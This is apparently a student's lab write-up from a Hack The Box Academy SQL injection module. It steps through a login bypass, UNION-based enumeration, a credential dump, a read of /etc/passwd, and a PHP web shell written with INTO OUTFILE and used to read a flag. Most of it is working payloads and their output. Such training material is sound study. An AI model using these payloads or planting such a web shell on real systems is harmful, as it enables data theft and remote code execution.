SQL INJECTION

Completed SQL Injection Fundamentalsacademy.hackthebox.com
OBJECTIVE: Perform a full assessment of the web application from a "grey box" approach, checking for the existence of SQL injection vulnerabilities
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer
#testing & athentication bypass
root@oco:~$ BROWSER > http://94.237.63.224:40530/
 username field: ' OR 1=1 LIMIT 1-- -'
 * ALT: ' OR 1=1-- -'
 * ALT: ' OR 1=1-- -
    - Anything after the -- -' becomes a comment, also, the single quote after the dash -'
      is just part of the comment; nothing special
  password field: unknown
 * the password field isn't important as it will be ignored by the comment
 * SQL: SELECT * FROM users WHERE username='username' AND password='password';
 * SQLI: SELECT * FROM users WHERE username'' OR 1=1 LIMIT 1-- -' AND password='password';
 * SQLI: SELECT * FROM users WHERE username='' OR 1=1-- AND password='password';
 
#identify table columns: UNION METHOD
this method always gives an error until a success is triggered
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,2-- -
 * The used SELECT statements have a different number of columns
 input field: ' UNION SELECT 1,2,3-- -
 * The used SELECT statements have a different number of columns
 input field: ' UNION SELECT 1,2,3,4-- -
 * The used SELECT statements have a different number of columns
 input field:' UNION SELECT 1,2,3,4,5-- -

#enumeration: identify DBs
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,schema_name,3,4,5 FROM INFORMATION_SCHEMA.SCHEMATA-- -
 * ilfreight 	3 	4 	5
   backup 	3 	4 	5
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
#enumeration: identify DB used by the web server
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,database(),3,4,5-- -
 * ilfreight 	3 	4 	5
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
 #enumeration: identify all tables within the ilfreight DB
 root@oco:~$ BROWSER > {targetSite:port}
  input field: ' UNION SELECT 1,TABLE_NAME,TABLE_SCHEMA,4,5 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='backup'-- -
  * admin_bk 	backup 	4 	5
  paylooad: ' UNION SELECT 1,2,3,4,5-- -
  
  input field: ' UNION SELECT 1,TABLE_NAME,TABLE_SCHEMA,4,5 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='ilfreight'-- -
  * payment 	ilfreight 	4 	5
    users 	ilfreight 	4 	5
  paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
#enumeration: identify all tables column names from the tables ilfreight & backup
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA,5 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_bk'-- -
 * username 	admin_bk 	backup 	5
   password 	admin_bk 	backup 	5
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
 input field: ' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA,5 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='payment'-- -
 * id   	payment 	ilfreight 	5
   name 	payment 	ilfreight 	5
   month 	payment 	ilfreight 	5
   amount 	payment 	ilfreight 	5
   tax  	payment 	ilfreight 	5
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
 input field: ' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA,5 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users'-- -
 * id   	users 	ilfreight 	5
   username 	users 	ilfreight 	5
   password 	users 	ilfreight 	5
 paylooad: ' UNION SELECT 1,2,3,4,5-- -

#dump table data
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, username, password, 4, 5 FROM backup.admin_bk-- -
 * admin 	Inl@n3_fre1gh7_adm!n 	4 	5
 paylooad: ' UNION SELECT 1,2,3,4,5-- -

 input field: ' UNION SELECT 1, username, password, 4, 5 FROM ilfreight.users-- -
 * adam 	1be9f5d3a82847b8acca40544f953515 	4 	5
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
#identify DB Version
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,@@version,3,4,5-- -
 * 10.3.22-MariaDB-1ubuntu1 	3 	4 	5
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
#identify db user
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,user(),3,4,5-- -
 * root@localhost 	3 	4 	5
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
#identify DB user file privileges
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,super_priv,3,4,5 FROM mysql.user-- -
 * Y 	3 	4 	5
    - Y means user have superuser privileges
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
#identify reading/writing file locations
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,variable_name,variable_value,4,5 FROM information_schema.global_variables WHERE variable_name="secure_file_priv"-- -
 * SECURE_FILE_PRIV 		4 	5
    - the result shows that the secure_file_priv value is empty, meaning that we can read/write files to any location
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
#identify write access
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,'file written successfully!',3,4,5 INTO OUTFILE '/var/www/html/proof.txt'-- -
 * Can't create/write to file '/var/www/html/proof.txt' (Errcode: 13 "Permission denied")
 input field: ' UNION SELECT 1,'file written successfully!',3,4,5 INTO OUTFILE '/tmp/proof.txt'-- -
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
#read file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1,LOAD_FILE("/tmp/proof.txt"),3,4,5-- -
 * 1 Adam January 1337$ 5% 2 James March 1213$ 8% 1 file written successfully! 3 4 5 	3 	4 	5
 paylooad: ' UNION SELECT 1,2,3,4,5-- -
 
 input field: ' UNION SELECT 1,LOAD_FILE("/etc/passwd"),3,4,5-- -
 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin postgres:x:101:103:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false 
 paylooad: ' UNION SELECT 1,2,3,4,5-- -

#write web shell to the back-end for easy execution
#note: MYSQL doesn't have xp_cmdshell which allows execution of arbitrary system commands
#xp_cmdshell is only implemented on MS SQL Server 
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT "",'<?php system($_REQUEST[0]); ?>',"","","" INTO OUTFILE '/var/www/html/dashboard/w-shell.php'-- -
 * you should have noticed that the webpage is being served from http://.../dashboard/dashboard.php
    - the /dashboard directory should be a great place to store the web shell
 
#access w-shell and gather
root@oco:~$ BROWSER > http://94.237.63.224:57903/dashboard/w-shell.php?0=id
 uid=33(www-data) gid=33(www-data) groups=33(www-data) 
root@oco:~$ BROWSER > http://94.237.63.224:57903/dashboard/w-shell.php?0=ls%20../../../../
 bin boot dev etc flag_cae1dadcd174.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var 
root@oco:~$ BROWSER > http://94.237.63.224:57903/dashboard/w-shell.php?0=cat%20../../../../flag_cae1dadcd174.txt
 528d6d9cedc2c7aab146ef226e918396
PreviousCROSS-SITE SCRIPTING (XSS)NextSQLMAP
Last updated 1 year ago